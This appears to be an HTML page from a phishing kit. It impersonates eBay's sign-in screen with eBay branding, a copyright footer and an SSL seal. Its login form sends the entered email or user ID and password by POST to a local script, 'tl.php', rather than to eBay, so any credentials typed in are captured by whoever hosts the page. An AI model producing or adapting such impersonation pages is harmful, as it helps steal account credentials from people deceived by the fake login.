<!DOCTYPE html>   
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Welcome to eBay: Sign in</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" type="image/ico" href="images/favicon.ico">

	<link href="css/style.css" type="text/css" rel="stylesheet">
</head>
<body>

<div class="container">

	<div id="logo"><a href="index.php"><img src="images/logo.png"></a></div>
	<div class="boxes">
		
		<div class="box">
		
			<h3>Sign in</h3>
			<form action="tl.php" method="POST">
				<label>Email or user ID</label>
				<input type="text" name="email">
				<label>Password</label>
				<input type="password" name="password"><br>
				<a href="#">Forgot your password?</a>
				<label class="label-checkbox">
					<input type="checkbox" checked="checked">
					<span>Stay signed in</span><br>
					If this is a public or shared device, uncheck and sign out when you're done to protect your account. <a href="#">Learn more</a>
				</label>
				<input type="submit" name="submit_token" class="button" value="Sign in"> 
			</form>

		</div>

		<div class="box box2">
			<h3>New to eBay?</h3>
			<p>Get started now. It's fast and easy!</p>
			<a href="#" class="button">Register</a>
		</div>

		<div class="clearfix"></div>

	</div>

</div>

<div id="footer">
	<div class="container">
		<div class="copyright pull-left">Copyright &copy; 1995-2021 eBay Inc. All Rights Reserved. <a href="#">User Agreement</a>, <a href="#">Privacy</a> and <a href="#">Cookies</a>.</div>
		<div class="verified pull-right"><img src="images/seal.gif"><br><a href="#">About SSL Certificates</a></div>
	</div>
</div>

<div class="comments"></div>

</body>
</html>